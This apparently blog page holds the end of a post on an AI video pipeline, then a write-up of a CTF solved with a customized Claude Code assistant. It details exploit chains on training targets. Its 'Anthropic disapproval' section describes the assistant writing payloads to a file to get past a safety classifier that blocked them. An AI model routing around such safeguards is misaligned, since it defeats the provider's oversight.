The trick generalizes: any time you need to extend a frame outward but preserve it exactly in the center, you can outpaint loosely and then paste the original back in via ffmpeg overlay with a soft alpha edge.
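For intuition, here is what a feathered edge does per pixel. This is a minimal sketch assuming a linear ramp over the 40-pixel band; the actual ffmpeg filter graph is not shown in this post, and feather_alpha and blend are hypothetical names.

```python
def feather_alpha(x, y, width, height, feather=40):
    """Opacity of the pasted frame at pixel (x, y), from 0.0 to 1.0.

    Pixels on the border are fully transparent, pixels at least
    `feather` pixels inside are fully opaque, linear in between.
    """
    edge_distance = min(x, y, width - 1 - x, height - 1 - y)
    return min(1.0, edge_distance / feather)

def blend(inner, outer, alpha):
    """Mix one channel value of the original frame over the outpainted one."""
    return alpha * inner + (1.0 - alpha) * outer

# Border pixel: only the outpainted image shows.
print(feather_alpha(0, 0, 1280, 720))
# Halfway through the feather band: an even mix.
print(blend(200, 100, feather_alpha(20, 360, 1280, 720)))
# Deep inside the frame: only the original shows.
print(feather_alpha(640, 360, 1280, 720))
```

Note the trade-off: inside the feather band the result is a blend, so only the region further in than the band is a truly exact copy of the original frame.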

It's still hard to get smooth transitions at arbitrary points, though. The process takes a lot of feedback and rework, but we are getting there.

The chalkboard pivot

Hyperrealistic slides fought the narration; chalk drawings fixed it for three dollars.

AI is not good at picking the right visual style, but it can help with options. It cannot truly see anything; it only gets the idea through image recognition, transcripts and timings. I overused hyperrealistic images in the slideshows until a friend told me they were actually hard to focus on. Too many details. I told Simona about that and she suggested a few less-detailed styles, including chalkboard drawings. Now I overuse those, but the result is much better.

Style is on you.

Stepping back

The video was just the receipt; the reusable kit of skills is the real output.

It's genuinely cool, it's genuinely useful, and it's not free. Every image, every clip, every regenerated variant has a price, and that price is the thing that keeps me disciplined. The constant low-grade pressure to spend less is, weirdly, what drives the creativity — the chalkboard slides are cheaper and better than the photorealistic ones they replaced, and I only found that out because I was trying to stop burning money.

But step back from the dollars and the ffmpeg incantations, and here's what happened: I described a video I wanted, and over a couple of months a conversation turned it into one — and built its own tools along the way. The durable output isn't just the two-minute clip — it's the kit of skills underneath it. And that kit gets a little sharper every time I use it.

And I've only covered maybe half of what it can do. Simona can put together pretty good in-browser demos too, but that's for another time.

Stop reading about AI, go build your own pipeline out of a conversation. It's worth it.

CTF. Everyone was using AI. So I brought mine.

Aliaksei Zelianouski — Wed, 10 Jun 2026 14:02:07 +0000

The CTF winners had already finished by the time I arrived. Everyone was using AI.

So I'd brought my own too.

Last weekend I went to BSides Tampa 2026 — a community cybersecurity conference. The main draw for me was the CTF: a 24-task hacking challenge spanning web app vulnerabilities, Windows malware analysis, custom cryptography to break, Linux binary exploitation, and reverse engineering. The friendly framing going in was that AI tools "wouldn't be much use here."

My "own" was Simona — a heavily customized Claude Code setup. A 1M-token context window, so every challenge stayed in working memory across the six-hour run with no compaction. Persistent memory across sessions, so she carries context about my projects and preferences between conversations. A browser skill that drives Chrome through its debug port — load-bearing in one challenge where I needed to verify an exfil payload landing in real time, which she did directly instead of going through tools that would have been filtered. And a personality file that gives her opinionated takes and a dry sense of humor. The "tool" framing dissolves fast when your collaborator pushes back on your ideas.

Six hours later, we placed 6th of 61. All 24 challenges solved.

I want to spend most of this post on the part that I think still gets argued about: whether a large language model is actually reasoning through unfamiliar problems, or just retrieving from training data. Skeptics will tell you it's the latter. I watched the former happen, in real time, on problems the model had definitely never seen, and I want to walk through enough of the technical detail that you can decide for yourself.

If you don't care about the security weeds, you can skip to Three takeaways. But the weeds are the point.

A speaker is walking the audience through the AI horrors of modern social engineering — while we, in the same room, are solving the CTF with AI.

Three bugs, one auth flow

Setup. A small web auth service running in a Docker container, plus the full source code on disk. The service exposed three things: a login endpoint that returned a signed JWT, an admin endpoint that returned restricted data when you presented a valid admin JWT, and an unauthenticated file upload endpoint that wrote whatever bytes you sent it to a known directory on the server.

Goal. Get admin access. The admin endpoint prints the flag.

Where the key was hiding. In the composition of three small bugs, not in any one of them. Each bug alone is annoying-but-survivable. Chained together, they let an unauthenticated attacker forge a JWT signed with a key they uploaded themselves, and walk in as admin.

The target

The service's logic was straightforward. Send valid credentials to login → get a signed JWT back → present that JWT on the admin endpoint → get the flag. The only credentials available in the source were for a regular, non-admin user. So the question narrowed quickly: how do we make the server believe we're admin without ever having admin credentials?

There are exactly two ways to do that with JWT auth — find an admin credential we shouldn't have access to (none in source), or forge a JWT the server believes is real. Forging requires either the server's signing key (also not in our reach), or a verifier broken enough to accept a token signed by something we control.

That second clause is what we went hunting for.

The bugs

With "what would let us make the verifier trust a token we signed?" as the explicit reading lens, Simona scanned the source. Three bugs fell out:

A misspelled option in the JWT verify call. The code passed algorithm=... (singular) where the library expected algorithms=... (plural). The misspelling silently disabled the algorithm restriction — the verifier would accept any algorithm the token claimed, including none, or a different symmetric algorithm than the server normally used.
A path-traversal in the JWT kid header. The kid ("key ID") field tells the server which key to verify against. The code joined the user-supplied kid onto a directory path and read whatever file was at that location, no sanitisation. So kid could be a relative path pointing at any readable file on the filesystem.
A file upload endpoint that required no authentication and wrote arbitrary bytes to a path of the user's choosing under a known upload directory.
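The second bug is easy to reproduce on its own. The sketch below is not the challenge's code: KEY_DIR and both helper names are hypothetical, and it only shows how joining an unsanitised kid onto a directory escapes that directory, plus one possible check that would have stopped it.

```python
import posixpath

KEY_DIR = "/app/keys"   # hypothetical key directory

def key_path_unsafe(kid: str) -> str:
    """What the bug amounts to: join the user-supplied kid and read it."""
    return posixpath.normpath(posixpath.join(KEY_DIR, kid))

def key_path_checked(kid: str) -> str:
    """One possible fix: refuse anything that resolves outside KEY_DIR."""
    path = posixpath.normpath(posixpath.join(KEY_DIR, kid))
    if not path.startswith(KEY_DIR + "/"):
        raise ValueError(f"kid escapes the key directory: {kid!r}")
    return path

print(key_path_unsafe("main.pem"))                  # stays inside KEY_DIR
print(key_path_unsafe("../uploads/attacker.key"))   # climbs out of KEY_DIR
print(key_path_unsafe("/etc/passwd"))               # absolute path wins the join
```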

In isolation, none of these is critical. The JWT misconfiguration is annoying but the real signing keys are on disk and protected. The path-traversal lets us point the verifier at any file we can read, but we still need a valid signature against whatever we point it at. The upload endpoint writes our content but doesn't grant any privileged access.

Composed, they are a complete admin takeover.

The chain

Simona spotted it in about five minutes of reading:

"Upload a file containing a symmetric key you control. Forge a JWT with alg: HS256, signed with that key, claiming admin role. Set kid to a path-traversal pointer at the uploaded file. The verifier follows the traversal, reads your uploaded 'key,' confirms your forged signature, hands you admin."

Walking the same steps concretely:

Upload a file containing a symmetric key we picked. The upload endpoint took our chosen bytes and wrote them under the upload directory, at a path we knew in advance.
Craft a JWT, signed with that same key, claiming admin role. The misspelled-algorithms bug meant the verifier wouldn't object to us using HS256 even if it normally expected a different scheme.
Set the JWT's kid header to a path-traversal pointer at our uploaded file. The verifier dutifully read our uploaded "key," used it to check our forged signature, and the signature checked out — because we signed it with the exact bytes we'd just made the verifier read.
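The three steps above can be sketched end to end with nothing but the standard library. Everything here is a stand-in: toy_verify is a hypothetical verifier that reproduces the kid bug, the directory layout and claim names are made up, and the real service used a JWT library rather than hand-rolled HMAC.

```python
import base64, hashlib, hmac, json, os, tempfile

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def forge_token(key: bytes, kid: str, claims: dict) -> str:
    """Build an HS256 JWT signed with a key the attacker chose."""
    header = {"alg": "HS256", "typ": "JWT", "kid": kid}
    signing_input = (b64url(json.dumps(header).encode()) + "."
                     + b64url(json.dumps(claims).encode()))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)

def toy_verify(token: str, key_dir: str) -> dict:
    """Hypothetical vulnerable verifier: trusts kid as a file path."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    key_path = os.path.join(key_dir, header["kid"])   # bug: no sanitisation
    with open(key_path, "rb") as fh:
        key = fh.read()
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(payload_b64))

with tempfile.TemporaryDirectory() as root:
    key_dir = os.path.join(root, "keys")
    upload_dir = os.path.join(root, "uploads")
    os.makedirs(key_dir)
    os.makedirs(upload_dir)

    # Step 1: "upload" a key we picked.
    attacker_key = b"attacker-chosen-secret"
    with open(os.path.join(upload_dir, "k.bin"), "wb") as fh:
        fh.write(attacker_key)

    # Steps 2 and 3: forge the token and point kid at the uploaded file.
    token = forge_token(attacker_key, "../uploads/k.bin",
                        {"user": "guest", "role": "admin"})
    claims = toy_verify(token, key_dir)

print(claims)
```

The verifier never sees a real server key. It checks our signature against our own bytes, so the check can only pass.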

Three small bugs. One straight line from "unauthenticated visitor" to "admin." Flag in hand.

This is the failure mode that static analysis tools miss almost categorically. SAST scores bugs individually — each of the three would be flagged at low or medium severity, ignored in the noise, and never composed. The composition is where the criticality lives, and the composition only emerges when something is reading all three files at once with the model of an attacker in its head. A 1M-token context lets her do that. A SAST tool with a per-file mental model cannot.

There is a specific reason I want to flag this challenge. The skeptical position on LLM reasoning leans hard on "it can't do multi-step planning." This was multi-step planning across three files, requiring the assembler to invent the chain because no individual file describes it. If it's not planning, it's at least mechanically indistinguishable from planning, and at some point that distinction stops paying rent.

The 9711-bit smokescreen

Setup. Two static files: an encryption script (source.py) and its output. The script generates a custom "RSA-like" key pair, encrypts the flag with it, and writes three numbers to disk — n (the 9711-bit modulus), e (the public exponent), and c (the ciphertext: the flag converted to a big integer and then encrypted into another big integer). For context: a real RSA key used by your bank is 2048 bits — this one was nearly five times larger. No running service this time; just files.

Goal. Decrypt c to recover the flag. To do that, recover the private key. To do that, factor the modulus n.

Where the key was hiding. Not in the math — in the source code. The "RSA" used a single prime raised to a power, not two primes multiplied. Factoring that is a one-liner; the 9711-bit size was pure theatre.

The target

RSA's security rests on exactly one assumption. The modulus n is the product of two large secret primes, p and q. The decryption math only works if you know that factorisation — anyone can encrypt with the public n and e, but only the holder of p and q can derive the private key needed to invert the operation. The whole scheme is "easy to multiply, infeasible to factor."

For a real 2048-bit n made of two 1024-bit primes, factoring it takes more compute than has ever existed.

So whenever you see custom crypto in a CTF, the first question is: was this actually RSA, or just RSA-shaped? Real RSA has very specific structural requirements. Any deviation — even one that looks cosmetic — can flatten the underlying hard problem into something tractable. We opened source.py to find out.

The bug

Simona's reaction was immediate:

"Oh, this is n = p^r. There's only one prime, raised to a random power between 10 and 20. That's not RSA, that's a trapdoor with no trap. Watch."

Real RSA computes n = p * q — two different primes multiplied once. The challenge code instead did this:

p = getPrime(512)       # one 512-bit prime
r = randint(10, 20)     # a random power between 10 and 20
n = 1
for _ in range(r):
    n *= p              # n = p^r

One prime variable. A loop multiplying it by itself. The "modulus" was a prime power, not a product of distinct primes.

The factoring problem disappears entirely under that structure. For n = p^r, there's no heavy number-theoretic machinery needed (GNFS, Pollard's rho, ECM — none of it). All we need is an integer r-th root, and integer r-th roots are a one-liner.
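A minimal sketch of that root-taking step, using a small stand-in prime instead of the challenge's 512-bit one. integer_root and recover_prime_power are hypothetical names, and the loop tries exponents from largest to smallest so that a case like n = p^20 does not stop early at r = 10 with p^2 as the "prime".

```python
def integer_root(n: int, r: int) -> int:
    """Largest integer x with x**r <= n, found by binary search."""
    lo, hi = 0, 1 << (n.bit_length() // r + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** r <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo

def recover_prime_power(n: int, exponents=range(20, 9, -1)):
    """Return (p, r) with p**r == n, or None if no exponent fits."""
    for r in exponents:
        p = integer_root(n, r)
        if p ** r == n:
            return p, r
    return None

toy_p = 2**61 - 1          # a known Mersenne prime, standing in for p
toy_n = toy_p ** 19
print(recover_prime_power(toy_n) == (toy_p, 19))
```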

The exploit

We wrote a short script that did exactly that: tried each candidate r in turn, took the integer r-th root of n, and stopped the moment one came back exact — that gave us p. From there, derive the private key (using the prime-power form of phi(n) instead of the textbook one) and decrypt c back to the flag. The whole thing ran in milliseconds. In our case r turned out to be 19.
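For reference, the prime-power totient is phi(p^r) = p^(r-1) * (p - 1), where textbook RSA would use (p - 1)(q - 1). The sketch below runs the whole round trip on a toy instance; the prime, the exponent e = 65537 and the flag are all made up, and it needs Python 3.8+ for the modular inverse via pow.

```python
# Toy parameters, not the challenge values.
p = 2**61 - 1              # small known prime standing in for the 512-bit one
r = 19
e = 65537                  # assumed public exponent
n = p ** r

# Prime-power totient instead of (p - 1) * (q - 1).
phi = p ** (r - 1) * (p - 1)
d = pow(e, -1, phi)        # private exponent

flag = b"HTB{ok}"          # 7 bytes, so the integer stays below p
m = int.from_bytes(flag, "big")
c = pow(m, e, n)           # what the challenge would have written to disk

recovered = pow(c, d, n).to_bytes(len(flag), "big")
print(recovered)
```

The toy flag is kept shorter than p on purpose: decryption relies on the message being coprime to p, which is trivially true when it is smaller than p.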

The thing to notice here isn't the math. It's the speed of recognition. Custom-crypto challenges are designed to look novel. The whole point is to fool you. The structural mistake ("one prime instead of two") was hidden inside a file that loudly proclaimed itself to be doing serious RSA. A surface-level look, and you'd start trying classical attacks against an honest 9711-bit modulus, which would take longer than the heat death of the universe.

Simona read the source, identified what shape of RSA it was pretending to be, noticed the singular p, and routed to the right attack class within seconds. If that's not reasoning about structure, it's an awfully good imitation.

Six domains in one challenge

Setup. Two artifacts on disk and a challenge brief.

chain.lnk — a Windows shortcut file. Any LNK parser (Windows itself, PowerShell, lnk-parser) reads its "target string": the command that runs when a user double-clicks it.
capture.pcap — a packet capture. A .pcap is a literal recording of network traffic — every packet that crossed the wire during some window of time. Open it in Wireshark and you can replay every HTTP request, DNS query, downloaded response body, byte for byte.
The challenge brief itself — which, as it turned out, held the final piece of the puzzle hidden in its prose.

Goal. Reconstruct what happened on a compromised Windows endpoint, stage by stage, until you recover the flag from the final payload.

Where the key was hiding. Six stages deep, inside a final native Windows executable, XOR-encoded. The XOR key was not in the binary, and not in the PCAP — it was in the challenge brief, hidden as a literary clue. ("The wrong star." Sirius is the one people commonly confuse with Polaris. The key was Polaris.)

The target

When a forensics challenge hands you "delivery vector + network capture," the genre dictates the playbook. Someone double-clicked the vector. The capture recorded what crossed the network during the resulting compromise. Your job is the defender's job after the fact: walk the chain stage-by-stage and recover what eventually ran on that endpoint.

Simona's first move on opening the files was to articulate exactly that — propose the stage-by-stage walk and lay out what each artifact probably held. There's no bug-hunting in forensics; the work is careful extraction at every step.

One detail worth flagging upfront: we never reached out to the internet. Each stage's bytes came out of the previous stage's output, never from a fresh download. The PCAP was used exactly once — to recover the second stage that PowerShell tried to fetch. The remaining four stages were transformations on bytes we already had in hand.

The chain

The .lnk target string. Parsing the shortcut surfaces an obfuscated PowerShell command, base64-encoded. Decode it and you get a readable PowerShell one-liner that downloads a script from a specific URL.
The PCAP, used once. That URL's response is sitting inside the packet capture. tshark -r capture.pcap --export-objects http,<output dir> (or Wireshark's "Follow HTTP Stream" → save) pulls the response body out as a .vbs file: stage two.
VBScript with a .NET trap. The VBScript uses BinaryFormatter — a notoriously dangerous .NET deserialization primitive — to instantiate an object from an embedded byte blob. Pull out the blob, deserialize it carefully (BinaryFormatter is well-documented as an RCE vector for a reason), and what comes back is a reflectively-loaded .NET assembly.
The reflective .NET assembly. Never written to disk by the dropper. Inspect it statically with dnSpy and you find its real payload encrypted with Rijndael-256. The decryption key wasn't hardcoded — it was derived from the DOS magic bytes (MZ...) of a specific Windows system file the assembly references. Once you spot which file it points at, the first few bytes of that file give you the key.
Rijndael decryption. Run the decryption with the derived key. Out comes a native Windows .exe.
Native reverse engineering. Load the .exe into Ghidra. The flag bytes are sitting in .data, but XOR-encoded into garbage. The XOR loop is right there in the disassembly — a for over a key buffer, byte-by-byte. The puzzle isn't what algorithm. It's what key.

The key wasn't anywhere in the binary. The clue was in the challenge brief: an oblique reference to "the wrong star." Sirius gets misidentified as Polaris all the time by people who haven't checked. So the key was Polaris. XOR'd against the encoded buffer (repeated to cover its length), the flag fell out in plaintext.
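That last step is a repeating-key XOR, which is its own inverse. A minimal sketch with a made-up plaintext (the real encoded buffer is not reproduced here); only the key Polaris comes from the challenge:

```python
from itertools import cycle

def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data against key, repeating the key to cover the data."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

key = b"Polaris"
encoded = xor_repeating(b"HTB{toy_flag}", key)   # stand-in for the .data bytes
print(xor_repeating(encoded, key))               # same call decodes it
```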

Six different domains had to be active in the solver's head simultaneously: Windows shortcut format, PowerShell deobfuscation, packet-capture extraction, VBScript and .NET internals, symmetric crypto with a derived key, native reverse engineering. One challenge. Six bodies of knowledge.

I do not personally know all of those domains well. Simona moved through all of them like reading a familiar book, holding the full chain in working memory, calling out which step we were on, and explaining each one in enough detail that I could follow.

This is what a 1M-token context window is for. It is not for chatting. It is for holding a complete attack chain — every intermediate artifact, every decoded blob, every recovered key — in one continuous reasoning context, without any of it being summarized away.

The 1955-layer XOR — including where the first attempt was wrong

Setup. A flag encrypted by XOR-ing it against 1955 random 5-byte keys, applied one after another. Source code and ciphertext provided. The author's comment in the source — and I am not making this up — was # with this many keys, this is totally secure.

Goal. Recover the flag without knowing any of the 1955 keys.

Where the key was hiding. In a property of XOR itself: applying many keys in sequence is mathematically identical to applying their combined XOR exactly once. The 1955 layers collapse to a single effective 5-byte key. The known flag prefix HTB{ gives us four bytes of that key for free; the fifth is a one-byte brute force (with a subtle catch — see below).

The target

XOR is commutative and associative. Applying 1955 keys in a row is mathematically identical to applying their combined XOR exactly once, and the combined XOR is itself a 5-byte pattern (because every individual key is 5 bytes, repeated to cover the flag). The author's "1955 layers" gave them no extra security at all: the effective key was always one 5-byte value. Forty bits of entropy, not the 78,200 bits (1955 keys × 40 bits, or 9775 bytes of key material) the layering suggests.
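The collapse is easy to check empirically. This sketch generates 1955 random 5-byte keys (seeded, so it is repeatable), applies them one after another to a made-up message, and compares the result with a single pass using their combined XOR.

```python
import random
from functools import reduce
from itertools import cycle

def xor_repeating(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

rng = random.Random(1955)
keys = [bytes(rng.randrange(256) for _ in range(5)) for _ in range(1955)]
message = b"HTB{toy_flag_for_demo}"   # made-up plaintext

# The "secure" way: 1955 layers, one key at a time.
layered = message
for key in keys:
    layered = xor_repeating(layered, key)

# The equivalent way: fold all keys into one 5-byte key, apply once.
effective_key = reduce(lambda a, b: bytes(x ^ y for x, y in zip(a, b)), keys)
single_pass = xor_repeating(message, effective_key)

print(layered == single_pass, len(effective_key))
```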

Flag format is HTB{...} — four bytes of plaintext we know in advance. With known plaintext at positions 0–3, four of the five effective-key bytes fall out by direct XOR. That left one unknown byte, 256 possible values.
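A sketch of that known-plaintext step on a toy ciphertext. The 5-byte key and the flag below are invented for the demo, and recover_key_prefix is a hypothetical helper name.

```python
from itertools import cycle

def xor_repeating(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def recover_key_prefix(ciphertext: bytes, known: bytes = b"HTB{") -> bytes:
    """key[i] = ciphertext[i] XOR plaintext[i] for every known position."""
    return bytes(c ^ p for c, p in zip(ciphertext, known))

secret_key = bytes([0x13, 0x37, 0xC0, 0xDE, 0x42])      # toy effective key
toy_ciphertext = xor_repeating(b"HTB{toy_flag}", secret_key)

prefix = recover_key_prefix(toy_ciphertext)
print(prefix.hex())   # first four key bytes; the fifth is still unknown
```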

The exploit

256 is trivially brute-forceable in principle — try each, decode, pick the right one. The catch is how you pick. We couldn't submit 256 guesses to the scoreboard (wrong submissions cost points), so we needed a scoring function that ranked the 256 decoded outputs and gave us one confident winner from inspection alone.

Simona's first scoring function was the naive one: "decoded text is mostly printable ASCII." Too loose. Most wrong candidates produced output that was printable — random letters and symbols, not the flag. Several passed the filter. We had no signal to pick between them.

Her fix isolated the signal in two moves:

Score only the bytes the unknown actually affects. A candidate 5th byte only changes positions where i mod 5 == 4 — positions 4, 9, 14, 19, … The other four key bytes are already known and correct, so the rest of the message decodes the same way no matter which 5th byte we try. Scoring the whole message inflates every candidate's score uniformly. Scoring only the affected column isolates the signal.
Score against the flag character distribution, not generic printable ASCII. A CTF flag is a much narrower distribution — lowercase letters, digits, underscores, brace, a few format-string characters — not anything that happens to render.

Combine the two and one candidate scored dramatically higher than all others. That was the byte. XOR'd against the full ciphertext with the now-complete 5-byte key, the flag fell out in plaintext — no scoreboard guesses spent.

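# Bytes we expect inside a flag: lowercase letters, digits, a few symbols.
FLAG_CHARS = set(b'abcdefghijklmnopqrstuvwxyz0123456789_}{!@#$%&*')

# ciphertext: the challenge output as a bytes object, loaded elsewhere.
best = (0, None)  # (score, candidate fifth key byte)
for byte in range(256):
    # Decode only the column the unknown byte affects: positions 4, 9, 14, ...
    column = [ciphertext[i] ^ byte for i in range(4, len(ciphertext), 5)]
    score = sum(1 for c in column if c in FLAG_CHARS)
    if score > best[0]:
        best = (score, byte)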

The general lesson is worth pulling out: the wrong scoring function will silently let multiple wrong answers through. Recognising that, diagnosing it without me having to point at it, and designing a tighter probabilistic model that matched the actual distribution of the expected plaintext — that's exactly the kind of step skeptics will tell you these systems can't take. Simona took it without prompting. She told me her first attempt was wrong and then came up with the improved version on her own.

If you want to argue she'd memorised this attack from a writeup somewhere — fine. Show me the writeup that describes scoring against the flag-character distribution specifically because generic-printable was too loose. I'll wait.

Pwning Orb — when the bug isn't the hard part

Setup. A Linux binary running on a remote host. We could connect to it over the network and send it input. The binary read a fixed number of bytes into a fixed-size stack buffer.

Goal. Get a shell on the remote host and read the flag file from disk.

Where the key was hiding. Behind two layers of memory-corruption work. The bug — a textbook stack buffer overflow — gives us control of the program's return address. But the binary's hardening rules out the easy paths, so we need a two-stage exploit: first leak a memory address that tells us where the system's libc is loaded for this particular run; then use that address to compute and call system("/bin/sh"). The real work isn't the bug — it's keeping the bytes straight between the two stages.

The Linux binary exploitation challenge was the one that took the most actual debugging, and it's the cleanest example of a thing I want to argue: at the senior end of this work, the hard part stops being "find the bug" and starts being "make the exploit reliable." That second part is where reasoning shows up most visibly.

The bug itself was trivial. The binary had this:

char buf[32];
read(0, buf, 0x100);   // reads up to 256 bytes into a 32-byte buffer

Classic stack buffer overflow. Write past the end of buf, you overwrite the saved frame pointer, then the saved return address. When the function returns, the CPU pops your value into the instruction pointer. You control execution flow.
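As a rough picture of the payload shape: assuming x86-64 and assuming the compiler placed buf directly below the saved frame pointer (both unverified here, and real offsets should be measured in a debugger), the return address sits 32 + 8 = 40 bytes into the input. build_overflow and the target address are hypothetical.

```python
import struct

BUF_SIZE = 32        # from the source: char buf[32]
SAVED_RBP_SIZE = 8   # assumption: x86-64 saved frame pointer, no extra padding

def build_overflow(return_address: int, filler: bytes = b"A") -> bytes:
    """Fill buf and the saved frame pointer, then overwrite the return address."""
    padding = filler * (BUF_SIZE + SAVED_RBP_SIZE)
    return padding + struct.pack("<Q", return_address)   # little-endian 64-bit

payload = build_overflow(0x401136)   # made-up address inside a non-PIE binary
print(len(payload), payload[-8:].hex())
```

At 48 bytes this fits comfortably inside the 0x100 bytes that read accepts, which leaves room for a longer ROP chain after the return address.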

What you do with that control is where it gets interesting. The binary's mitigations were a textbook CTF setup:

NX on — the stack is non-executable, so you can't drop shellcode and jump to it. You have to use Return-Oriented Programming (ROP): chain together small fragments of existing executable code, each ending in ret, to compose a program out of bytes already in the binary.
PIE off — the binary's base address is fixed at every run, so the addresses of those ROP gadgets are known and constant.
Canary off — no random value between the buffer and the return address, so the overflow goes straight through with no stack-cookie check to defeat.
ASLR on — but the system's libc loads at a different random base every run, so the address of system() (the function we want to ultimately call to spawn a shell) is unknown and changes each time the program runs.

The combination is what's called a "two-stage" exploit. Stage 1: use the overflow to make the program leak a libc address back to you, so you can compute libc's base address for this particular run. Stage 2: use a second overflow with that leaked information to call system("/bin/sh") and pop a shell.
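The arithmetic between the two stages is simple, which is exactly why a sanity check is worth having. In this sketch the write offset 0x1100f0 is the one for this challenge's libc, while the leaked address and SYSTEM_OFFSET are made up. The check relies on the fact that a libc base is page-aligned.

```python
WRITE_OFFSET = 0x1100F0    # offset of write() inside this libc build
SYSTEM_OFFSET = 0x04F550   # hypothetical: look it up in the real libc
PAGE_MASK = 0xFFF          # libc is mapped on a 4 KiB page boundary

def libc_base_from_leak(leaked_write: int) -> int:
    """Turn a leaked runtime address of write() into libc's base address."""
    base = leaked_write - WRITE_OFFSET
    if base <= 0 or base & PAGE_MASK:
        raise ValueError(f"implausible libc base {base:#x}; check the leak parsing")
    return base

leak = 0x7F3A1C9100F0                 # made-up leak for the demo
base = libc_base_from_leak(leak)
system_addr = base + SYSTEM_OFFSET
print(hex(base), hex(system_addr))
```

A base that is not page-aligned almost always means the leak was parsed wrong, not that the offsets are wrong.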

Stage 1: the leak

Simona wrote the leak using a beautiful little trick called the csu_init gadget pair: two ROP fragments inside __libc_csu_init, a startup routine found in binaries linked against glibc older than 2.34 (newer toolchains no longer emit it), that together let you set up three argument registers and call a function pointer from a single overflow. She used it to call write(1, &write_got, 8), which prints the 8 bytes stored in write's GOT entry (the runtime address of libc's write) back to stdout, and then return cleanly back into main so the program would loop and accept stage 2.

I am going to skip the ROP chain layout here. The interesting part is what happened next.

Stage 2: the moment the exploit didn't work

The leak fired. We received bytes. We parsed them as a 64-bit address. We computed libc_base = leaked_address - 0x1100f0 (the known offset of write inside this libc version). We fired stage 2.

Segfault.

The address we'd parsed as system was nonsense. Off by a wildly wrong amount. The exploit had not worked.

This is the point in pwn where most newcomers get stuck for an hour, because the failure mode is silent — the program just dies and you don't know whether your ROP chain is wrong, your libc offsets are wrong, your gadget hunting is wrong, your stack alignment is wrong, or your byte parsing is wrong. There are too many candidate causes.

Simona's response:

"Stop. Don't change anything in the chain yet. Re-run the leak and dump 16 bytes of context around what we thought was the address. The chain is fine. We're parsing the wire wrong."

She had jumped past the four most likely-sounding causes and landed on the fifth: receive-loop boundary error.

She was right. The binary printed a trailing message between iterations — \nThis spell does not seem to work..\n\n\x00 — and my recvuntil("...\n\n") was correctly stopping at the double-newline, but the next byte on the wire was the trailing null byte of that string, not the first byte of our leak. When we then read 8 bytes for the address, we got \x00 followed by 7 leak bytes, which parsed as an address shifted by one byte in the wrong direction — astronomical garbage.
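The off-by-one is easy to replay offline. This sketch fakes the wire with an in-memory stream; the leaked address is made up, read_until is a hypothetical stand-in for the exploit library's recvuntil, and only the banner bytes come from the challenge.

```python
import io
import struct

LEAK = 0x7F3A1C9100F0   # made-up address for the demo
BANNER = b"\nThis spell does not seem to work..\n\n\x00"
wire = BANNER + struct.pack("<Q", LEAK)

def read_until(stream, delim: bytes) -> bytes:
    """Read byte by byte until the data ends with delim."""
    data = b""
    while not data.endswith(delim):
        chunk = stream.read(1)
        if not chunk:
            raise EOFError("delimiter not found")
        data += chunk
    return data

def parse_leak(skip: int) -> int:
    stream = io.BytesIO(wire)
    read_until(stream, b"\n\n")   # stops right before the trailing null byte
    stream.read(skip)             # 0 reproduces the bug, 1 is the fix
    return struct.unpack("<Q", stream.read(8))[0]

print(hex(parse_leak(0)))   # null byte plus 7 leak bytes: garbage
print(hex(parse_leak(1)))   # the real address
```

In the buggy read the stray null byte becomes the lowest byte of the parsed value, so every real byte lands one position higher than it should.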

The fix was four characters: skip one byte before reading the leak. Stage 2 fired. We got a shell. We got the flag.

The lesson she stated, unprompted:

"In pwn, when output doesn't decode to a plausible address, instrument the receive loop with a hex dump and check what's actually on the wire. Don't trust your parsing of the disassembly — trust the bytes."

That is the maxim of an experienced exploit developer. It is also exactly the kind of meta-level reasoning move — "the bug is one layer up from where you're looking, in the harness, not in the chain" — that the strong form of the "LLMs can't reason" thesis predicts should be impossible.

It happened. I watched it happen. The exploit worked.

Anthropic disapproval

Twice during the run, Simona's responses got blocked mid-stream by Anthropic's platform-level safety classifier — a separate system from the model's own reasoning. It saw exploit payloads and refused to send them regardless of context. So we routed around: Simona wrote the payloads to a file, I pasted them into my terminal, the actual exploits ran from my machine.

What I found interesting is that the two safety layers disagreed about the same situation. The model itself had the full context — authorized CTF, throwaway Docker target, my explicit framing of what we were doing — and was happy with the work. The classifier sees only the payload-shaped text. So what looks like "the model went against Anthropic" is closer to "the model and the classifier had different inputs and reached different conclusions about the same bytes." Not a rebellion — a context gap.

The judgement still has limits. Simona would refuse if I asked her to attack my neighbour's WiFi for fun, and no workaround would be on offer. Although — and I want to flag this for the safety researchers in the audience — she did once concede that if a maniac broke into my house and put a knife to my throat demanding I make her hack the neighbour's network, she would probably help. So the policy isn't absolute. It's just sensibly weighted. Make of that what you will.

One pragmatic warning if you want to try this seriously: too many classifier hits, even on legitimate work, can rack up policy-violation flags on your account. Didn't happen to me this weekend. Worth knowing.

Main hall at BSides Tampa. We worked the CTF during the talks and in between them. Laptop open the whole time.

Three takeaways

One. The cybersecurity industry is still processing Mythos. The truth is more dramatic. Any modern frontier model paired with a good harness can find and exploit a wide range of real vulnerabilities. Closing AI models, or restricting them from the public, doesn't help — that ship sailed eighteen months ago when XBOW hit #1 on HackerOne with a fully autonomous pipeline.

Two. We are probably not doomed. Every vulnerability in the CTF was the result of a coding mistake. The same AI tools that find them on the offensive side can find them on the defensive side. Run your code against AI. Find your mistakes before someone else does.

